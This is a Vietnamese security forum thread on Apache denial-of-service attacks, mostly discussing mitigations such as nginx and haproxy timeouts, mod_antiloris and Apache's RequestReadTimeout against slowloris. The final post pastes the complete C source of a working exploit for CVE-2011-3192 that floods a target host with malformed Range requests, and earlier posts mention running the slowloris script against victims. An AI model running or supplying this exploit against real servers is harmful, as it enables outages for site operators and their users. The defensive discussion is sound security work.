banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Apache HTTP DoS  XML
  [Announcement]   Apache HTTP DoS 29/06/2009 17:53:38 (+0700) | #31 | 184936
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

Abe wrote:

Theo em đánh giá thì vẫn đề này hết sức nghiệm trọng chứ không phải bình thường nên thời gian là 2 tuần cho tới bây giờ là tương đối dài. Thật ra thì em đánh giá các bạn có được trong tay 1 hay nhiều botnets không hề thấp nên việc các bạn ý làm ra 1 quả binary rồi cho pwned users exec là việc không hề khó smilie

Còn hiện tại thì vẫn có rất nhiều bạn "đơn nam" solo chết một cơ số các site/server, đặc biệt là mấy bạn hosting. Việc ngồi canh để Ban IP thật ra thì cũng không phải là một cách hay và dễ chịu đâu anh ạ smilie

Bên cạnh đó, trong một số trường hợp (mà em đã được chứng thực) thì khá nhiều tay sysadmin hết sức lúng tung khi gặp phải vấn đề này, từ "wtf" cho tới "when", "why", "how" smilie

Vấn đề mấy ông vò đầu bứt tai thì quả thực là p4int in @ss nhưng mà cũng có cực nhiều đồng chí chả cần biết nó cần những modules / dependencies gì mà vẫn thấy perl -dns victim.vn ầm ầm mà không gặp trở ngại nào smilie , vấn đề ở chỗ cái liveCD/cái nhiều cái OS image nó có full hết rồi smilie
 


-----> sao nghe thủ công quá vậy? smilie

-----> đây là do sysadmin được train cho... mì ăn liền thì phải vậy thôi.

Abe wrote:

Absolutely agree. Em cũng đã nghĩ như anh, vấn đề em thắc mắc là bạn Apache foundation không/chưa có một động thái gì, ít nhất là để trấn an cộng đồng blah blah.. vì em nghĩ các bạn ý sẽ không ra patch mà sẽ sớm release new version sau hơn nửa năm..ngủ quên lol .. còn cả bạn Squid nữa chứ..


May mà đây toàn là các bạn Opensource.. chứ không thì mấy bạn như nginx phê đừng hỏi smilie  

Anh nghĩ họ không cần lên tiếng vì nếu họ chính thức lên tiếng thì càng làm cho thiên hạ rối lên mà thôi.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 29/06/2009 21:58:02 (+0700) | #32 | 184946
[Avatar]
tranvanminh
HVA Friend

Joined: 04/06/2003 06:36:35
Messages: 516
Location: West coast
Offline
[Profile] [PM]

8668 wrote:
Đã làm theo cách của bác tranvanminh,cải thiện tốc độ chút ít! 


Thật ra khi tui post bài đó lên , tui và lão Hoàng cũng đã thử điều chỉnh sao cho thằng nginx hiệu quả , ruốt cuộc đúc kết được mấy cái option này .

worker_processes 2
client_header_timeout 5;
ignore_invalid_headers on;
limit_zone gulag $binary_remote_addr 1m;
 


Nó hoạt động như thế nào thì bạn vào đọc tài liệu tại https://calomel.org/nginx.html .

Hôm qua, có bạn hỏi thăm tui, bây giờ server đang hoạt động nên không thể ráp thêm 1 con proxy vào và cũng không có tiền để mua server cho việc phòng hờ . Nhưng mà theo như kết quả test , thì mình chỉ cần cài đặt nginx vào server chung với apache vẫn có hiệu quả chống slowloris được như thường . Cách làm như tui đã post , chỉ cần cài đặt như bài trên thì cũng ngon lành rồi .

Còn có thật hay không thì các bạn tự làm thử đi rồi biết smilie
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 30/06/2009 03:31:19 (+0700) | #33 | 184979
8668
Member

[Minus]    0    [Plus]
Joined: 25/06/2008 18:30:36
Messages: 24
Offline
[Profile] [PM]

tranvanminh wrote:

8668 wrote:
Đã làm theo cách của bác tranvanminh,cải thiện tốc độ chút ít! 


Thật ra khi tui post bài đó lên , tui và lão Hoàng cũng đã thử điều chỉnh sao cho thằng nginx hiệu quả , ruốt cuộc đúc kết được mấy cái option này .

worker_processes 2
client_header_timeout 5;
ignore_invalid_headers on;
limit_zone gulag $binary_remote_addr 1m;
 


Nó hoạt động như thế nào thì bạn vào đọc tài liệu tại https://calomel.org/nginx.html .

Hôm qua, có bạn hỏi thăm tui, bây giờ server đang hoạt động nên không thể ráp thêm 1 con proxy vào và cũng không có tiền để mua server cho việc phòng hờ . Nhưng mà theo như kết quả test , thì mình chỉ cần cài đặt nginx vào server chung với apache vẫn có hiệu quả chống slowloris được như thường . Cách làm như tui đã post , chỉ cần cài đặt như bài trên thì cũng ngon lành rồi .

Còn có thật hay không thì các bạn tự làm thử đi rồi biết smilie  


Cách đơn giản nhất để cài nginx làm proxy:
http://www.howtoforge.com/reduce-apache-load-with-nginx-rhel5.2

Tốt nhất là compile lại nginx vì gói rpm cũ qua rồi!

Cảm ơn bác tranvanminh đã đưa ra giải pháp khá thú vị!
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 02/07/2009 05:37:22 (+0700) | #34 | 185127
[Avatar]
sup3rmm
Member

[Minus]    0    [Plus]
Joined: 17/08/2006 22:14:28
Messages: 21
Offline
[Profile] [PM]
Các bác dùng thử thằng này http://haproxy.1wt.eu/, option timeout http-request, cái này chắc đúng ý bác male smilie. Em apply thằng này cho hệ thống đến nay vẫn ổn
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 16/07/2009 22:01:18 (+0700) | #35 | 186470
matrix
Member

[Minus]    0    [Plus]
Joined: 17/03/2004 21:56:18
Messages: 1
Offline
[Profile] [PM]
Giải pháp tạm thời trên máy đơn khi chưa có bản vá cho apache bạn thử install cái mod_antiloris thử xem.

Tham khảo link tôi gởi kèm:

ftp://ftp.monshouwer.eu/pub/linux/mod_antiloris/




[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 07/05/2010 15:36:14 (+0700) | #36 | 210489
xxxxx.kenji.xxxxx
Member

[Minus]    0    [Plus]
Joined: 05/05/2010 23:49:47
Messages: 2
Offline
[Profile] [PM]
Loay hoay mãi vẩn chưa run được, đuối.....Có bác nào giúp e trải nghiệm với, vì em không rành về Perl. Thanks!
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 10/05/2010 05:09:02 (+0700) | #37 | 210589
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

xxxxx.kenji.xxxxx wrote:
Loay hoay mãi vẩn chưa run được, đuối.....Có bác nào giúp e trải nghiệm với, vì em không rành về Perl. Thanks! 


Bồ muốn "trải nghiệm" cái gì? Không rành về Perl thì học Perl, thực hành Perl. Sách về Perl có một tỉ cuốn trên mạng kìa. Những cái này không có ai có thể giúp được cả.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 10/05/2010 05:50:15 (+0700) | #38 | 210590
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Phiên bản apache httpd 2.2.15 (trở đi) có thêm module mod_reqtimeout hiện đang ở tình trạng "experimental". Module này cho phép ấn định giá trị "timeout" của request. Có hai phần chính trong directive RequestReadTimeout đó là timeout cho "body" và timeout cho "header". Đối với slowloris, giá trị timeout cho "header" chính là biện pháp chống chọi với dạng DDoS được thảo luận ở trên. Nó tương tự với giá trị client_header_timeout của nginx. Tuy nhiên, xét về mặt kỹ thuật thì RequestReadTimeout của apache hay hơn client_header_timeout của nginx ở chỗ nó có thêm giá trị "MinRate" đi kèm. Giá tri "MinRate" này là một phương tiện để ấn định khả năng gia giảm giá trị "timeout" dynamically. Bởi vậy, nó uyển chuyển hơn client_header_timeout của nginx.

Ví dụ:

RequestReadTimeout header=5-10,MinRate=500

Dòng ấn định trên có nghĩa nôm na là một request đi vô sẽ được httpd apache chờ đợi thông tin của request header (chỉ header chớ không bao gồm luôn body) là 5 giây. Nếu phía client gởi data cho phần header thì cứ mỗi 500 bytes mà httpd apache nhận được, nó sẽ gia tăng timeout thêm 1 giây. Nhưng nếu sau 10 giây mà không có thêm thông tin gì cho header nữa thì apache httpd sẽ huỷ connection của client đó. Tính uyển chuyển nằm ở chỗ nếu phía client có thật sự gởi data thì gia tăng giá trị "timeout" để tạo điều kiện cho client ấy tiếp tục gởi. Tuy nhiên, apache vẫn ấn định thời gian tối đa để gởi một http header là 10 giây.

Trong tình trạng bị slowloris tấn công, RequestReadTimeout giúp triệt tiêu các connections mà slowloris tạo ra trong một khoảng thời gian được ấn định cụ thể thay vì bị tràn ngập hết "MaxClients" và hoàn toàn không thể tiếp tục phục vụ.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 11/05/2010 11:03:10 (+0700) | #39 | 210682
xxxxx.kenji.xxxxx
Member

[Minus]    0    [Plus]
Joined: 05/05/2010 23:49:47
Messages: 2
Offline
[Profile] [PM]

conmale wrote:

xxxxx.kenji.xxxxx wrote:
Loay hoay mãi vẩn chưa run được, đuối.....Có bác nào giúp e trải nghiệm với, vì em không rành về Perl. Thanks! 


Bồ muốn "trải nghiệm" cái gì? Không rành về Perl thì học Perl, thực hành Perl. Sách về Perl có một tỉ cuốn trên mạng kìa. Những cái này không có ai có thể giúp được cả. 



Đã run, thanks!
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 24/07/2010 00:16:29 (+0700) | #40 | 216191
Monkey.D.Luffy
Member

[Minus]    0    [Plus]
Joined: 22/07/2009 10:18:18
Messages: 9
Location: @
Offline
[Profile] [PM]
Hi, giúp em vấn đề này với.

Em đã setup nginx và chạy thành công nhưng bị lỗi này.

File config em như sau:
-nginx listen ở port 80
-apache listen ở port 8000
-forum em chạy vbb
Em vẫn chạy forum được với path http://site/forum/index.php nhưng có những script ví dụ như login, newpost nó lại bị wwwect về http://site:8000/forum/xxx.php? thế là ko thể connect được, muốn connect thì phải bỏ :8000 ở path, em muốn hỏi là làm sao để khắc phục tình trạng này?

Thân.
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 24/07/2010 02:20:50 (+0700) | #41 | 216192
Monkey.D.Luffy
Member

[Minus]    0    [Plus]
Joined: 22/07/2009 10:18:18
Messages: 9
Location: @
Offline
[Profile] [PM]
Hê hê, em fix được rồi mấy pác smilie
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 24/07/2010 20:13:07 (+0700) | #42 | 216233
Monkey.D.Luffy
Member

[Minus]    0    [Plus]
Joined: 22/07/2009 10:18:18
Messages: 9
Location: @
Offline
[Profile] [PM]
Bây giờ thì em lại có vấn đề với cache.
Em đã config lưu cache thành công đối với file image,css,js nhưng đối với script thì nó vẫn lưu lại cache nên mỗi lần post bài thì phải F5 mới hiển thị được bài viết.

Làm sao ko cho script *.php ko lưu lại cache mấy anh? Em đang sử dụng nginx 7.x nên ko có option proxy_no_cache, giờ chẳng biết làm sao, ai help em với ạ smilie

Thân.
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 01/08/2010 20:02:08 (+0700) | #43 | 217196
huyannet
Member

[Minus]    0    [Plus]
Joined: 21/07/2008 00:42:51
Messages: 83
Offline
[Profile] [PM]
- Nếu xài chung 1 proxy thì thằng proxy sẽ lảnh đạn trước rồi mới tới mình,
Chắc chắn Proxy sẽ tự bảo vệ, điều đó cũng có nghĩa proxy là tấm đỡ cho mình 1 phần,
Đứa nào qua được proxy thì mình đập đầu từng đứa 1 smilie
- Còn nếu dùng proy cá nhân thì chỉ cần đập 1 cái chết liền đỡ mỏi tay hơn ở trên smilie .

Em là nêu bai, lời em nói chỉ lai rai, có gì sai xin giả nai, đừng cho bái bai, kẻo em die. smilie
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 02/08/2010 10:08:11 (+0700) | #44 | 217256
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

huyannet wrote:
- Nếu xài chung 1 proxy thì thằng proxy sẽ lảnh đạn trước rồi mới tới mình,
Chắc chắn Proxy sẽ tự bảo vệ, điều đó cũng có nghĩa proxy là tấm đỡ cho mình 1 phần,
Đứa nào qua được proxy thì mình đập đầu từng đứa 1 smilie
- Còn nếu dùng proy cá nhân thì chỉ cần đập 1 cái chết liền đỡ mỏi tay hơn ở trên smilie .

Em là nêu bai, lời em nói chỉ lai rai, có gì sai xin giả nai, đừng cho bái bai, kẻo em die. smilie  


Hiểu rõ vấn đề rồi hãy có ý kiến. Đừng đọc lướt rồi hiểu sai dẫn đến chỗ phát biểu trật lất hết.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 07/11/2010 08:34:22 (+0700) | #45 | 224401
LlyKil
Member

[Minus]    0    [Plus]
Joined: 22/01/2008 18:33:58
Messages: 16
Offline
[Profile] [PM]

Monkey.D.Luffy wrote:
Hi, giúp em vấn đề này với.

Em đã setup nginx và chạy thành công nhưng bị lỗi này.

File config em như sau:
-nginx listen ở port 80
-apache listen ở port 8000
-forum em chạy vbb
Em vẫn chạy forum được với path http://site/forum/index.php nhưng có những script ví dụ như login, newpost nó lại bị wwwect về http://site:8000/forum/xxx.php? thế là ko thể connect được, muốn connect thì phải bỏ :8000 ở path, em muốn hỏi là làm sao để khắc phục tình trạng này?

Thân.
 

Bạn có thể giải thích rõ chổ này giúp mình được không?
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 26/11/2010 17:48:13 (+0700) | #46 | 225592
lequi
Member

[Minus]    0    [Plus]
Joined: 29/04/2007 18:13:32
Messages: 77
Offline
[Profile] [PM]

Monkey.D.Luffy wrote:
Bây giờ thì em lại có vấn đề với cache.
Em đã config lưu cache thành công đối với file image,css,js nhưng đối với script thì nó vẫn lưu lại cache nên mỗi lần post bài thì phải F5 mới hiển thị được bài viết.

Làm sao ko cho script *.php ko lưu lại cache mấy anh? Em đang sử dụng nginx 7.x nên ko có option proxy_no_cache, giờ chẳng biết làm sao, ai help em với ạ smilie

Thân. 


Bạn gửi nội dung file nginx config lên đây thì mọi người mới có thể giúp được smilie
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 21/12/2010 08:36:29 (+0700) | #47 | 227508
[Avatar]
theghoststone
Member

[Minus]    0    [Plus]
Joined: 26/05/2010 04:32:15
Messages: 5
Location: Trà Vinh
Offline
[Profile] [PM] [Email] [Yahoo!]
Quyết liệt quá, nhìn mà ghiền, ước gì mình hiểu tất cả, chỉ hiểu 30%
Xác Định Chính Xác Những Gì Mình Cần Làm Là Tối Quan Trọng Nhất
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 21/09/2011 18:58:28 (+0700) | #48 | 247539
[Avatar]
chiro8x
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]
=.=! Cái này có gì hot ! nếu thiết lập request timeout hợp lý là ổn rồi. Ai biểu keep-alive làm chi.
while(1){}
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 21/09/2011 19:01:25 (+0700) | #49 | 247540
[Avatar]
chiro8x
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]

conmale wrote:
Phiên bản apache httpd 2.2.15 (trở đi) có thêm module mod_reqtimeout hiện đang ở tình trạng "experimental". Module này cho phép ấn định giá trị "timeout" của request. Có hai phần chính trong directive RequestReadTimeout đó là timeout cho "body" và timeout cho "header". Đối với slowloris, giá trị timeout cho "header" chính là biện pháp chống chọi với dạng DDoS được thảo luận ở trên. Nó tương tự với giá trị client_header_timeout của nginx. Tuy nhiên, xét về mặt kỹ thuật thì RequestReadTimeout của apache hay hơn client_header_timeout của nginx ở chỗ nó có thêm giá trị "MinRate" đi kèm. Giá tri "MinRate" này là một phương tiện để ấn định khả năng gia giảm giá trị "timeout" dynamically. Bởi vậy, nó uyển chuyển hơn client_header_timeout của nginx.

Ví dụ:

RequestReadTimeout header=5-10,MinRate=500

Dòng ấn định trên có nghĩa nôm na là một request đi vô sẽ được httpd apache chờ đợi thông tin của request header (chỉ header chớ không bao gồm luôn body) là 5 giây. Nếu phía client gởi data cho phần header thì cứ mỗi 500 bytes mà httpd apache nhận được, nó sẽ gia tăng timeout thêm 1 giây. Nhưng nếu sau 10 giây mà không có thêm thông tin gì cho header nữa thì apache httpd sẽ huỷ connection của client đó. Tính uyển chuyển nằm ở chỗ nếu phía client có thật sự gởi data thì gia tăng giá trị "timeout" để tạo điều kiện cho client ấy tiếp tục gởi. Tuy nhiên, apache vẫn ấn định thời gian tối đa để gởi một http header là 10 giây.

Trong tình trạng bị slowloris tấn công, RequestReadTimeout giúp triệt tiêu các connections mà slowloris tạo ra trong một khoảng thời gian được ấn định cụ thể thay vì bị tràn ngập hết "MaxClients" và hoàn toàn không thể tiếp tục phục vụ. 


Bài của anh conmale quá chuẩn luôn smilie. Lúc nãy em đọc không kĩ. Thực ra slowris không có gì quá ghê gớm cả. Slowris lợi dụng việc Apache nhầm lẫn giữa \r\n\r\n và \r\n khiến cho nó không thể kết thúc truy vấn được.
while(1){}
[Up] [Print Copy]
  [Announcement]   Apache HTTP DoS 10/12/2011 21:13:24 (+0700) | #50 | 250961
tuyenhva
Member

[Minus]    0    [Plus]
Joined: 12/07/2010 20:43:58
Messages: 8
Offline
[Profile] [PM]
1 code dos vào Apache mới trên exploit-db.com

Code:
/*
 * This is a reverse engineered version of the exploit for CVE-2011-3192 made
 * by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).
 * Copyright 2011 Ramon de C Valle <rcvalle@redhat.com>
 *
 * Compile with the following command:
 * gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <pthread.h>
 
void ptrace_trap(void) __attribute__ ((constructor));
 
void
ptrace_trap(void) {
    if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
        write(fileno(stdout), "Segmentation fault\n", 19);
        exit(-1);
    }
}
 
void
w4rn41dun14mu(int attr, int fg, int bg)
{
    char command[13];
 
    sprintf(command, "%c[%d;%d;%dm", 0x1b, attr, fg+30, bg+40);
    printf("%s", command);
}
 
void
banner()
{
    w4rn41dun14mu(0, 1, 0);
    fwrite("Remote Apache Denial of Service Exploit by ev1lut10n\n", 53, 1,
           stdout);
}
 
void
gime_er_mas()
{
    printf("%c%s", 0x1b, "[2J");
    printf("%c%s", 0x1b, "[1;1H");
    puts("\nsorry dude there's an error...");
}
 
struct thread_info {
    pthread_t thread_id;
    int       thread_num;
    char     *argv_string;
};
 
static void *
thread_start(void *arg)
{
    struct thread_info *tinfo = (struct thread_info *) arg;
    char hostname[64];
    int j;
 
    strcpy(hostname, tinfo->argv_string);
 
    j = 0;
    while (j != 10) {
        struct addrinfo hints;
        struct addrinfo *result, *rp;
        int sfd, s;
        ssize_t nwritten;
 
        memset(&hints, 0, sizeof(struct addrinfo));
        hints.ai_family = AF_UNSPEC;
        hints.ai_socktype = SOCK_STREAM;
        hints.ai_flags = 0;
        hints.ai_protocol = 0;
 
        s = getaddrinfo(hostname, "http", &hints, &result);
        if (s != 0) {
            fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(s));
            exit(EXIT_FAILURE);
        }
 
        for (rp = result; rp != NULL; rp = rp->ai_next) {
            sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);
            if (sfd == -1)
                continue;
 
            if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1)
                close(sfd);
        }
 
        if (result != NULL)
            freeaddrinfo(result);
 
        nwritten = write(sfd, "HEAD / HTTP/1.1\n"
                              "Host:localhost\n"
                              "Range:bytes=0-,0-\n"
                              "Accept-Encoding: gzip", 71);
        if (nwritten == -1)
            close(sfd);
 
        usleep(300000);
 
        j++;
    }
 
    return 0;
}
 
int
main(int argc, char *argv[])
{
    int i;
    struct thread_info tinfo;
 
    banner();
 
    if (argc <= 1) {
        w4rn41dun14mu(0, 2, 0);
        fwrite("\n[-] Usage : ./rapache hostname\n", 32, 1, stdout);
        return 0;
    }
 
    w4rn41dun14mu(0, 3, 0);
    printf("[+] Attacking %s please wait  in minutes ...\n", argv[1]);
 
    while (1) {
        i = 0;
        while (i != 50) {
            tinfo.thread_num = i;
            tinfo.argv_string = argv[1];
 
            pthread_create(&tinfo.thread_id, NULL, &thread_start, &tinfo);
 
            usleep(500000);
 
            i++;
        }
    }
}


http://www.exploit-db.com/exploits/18225/
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|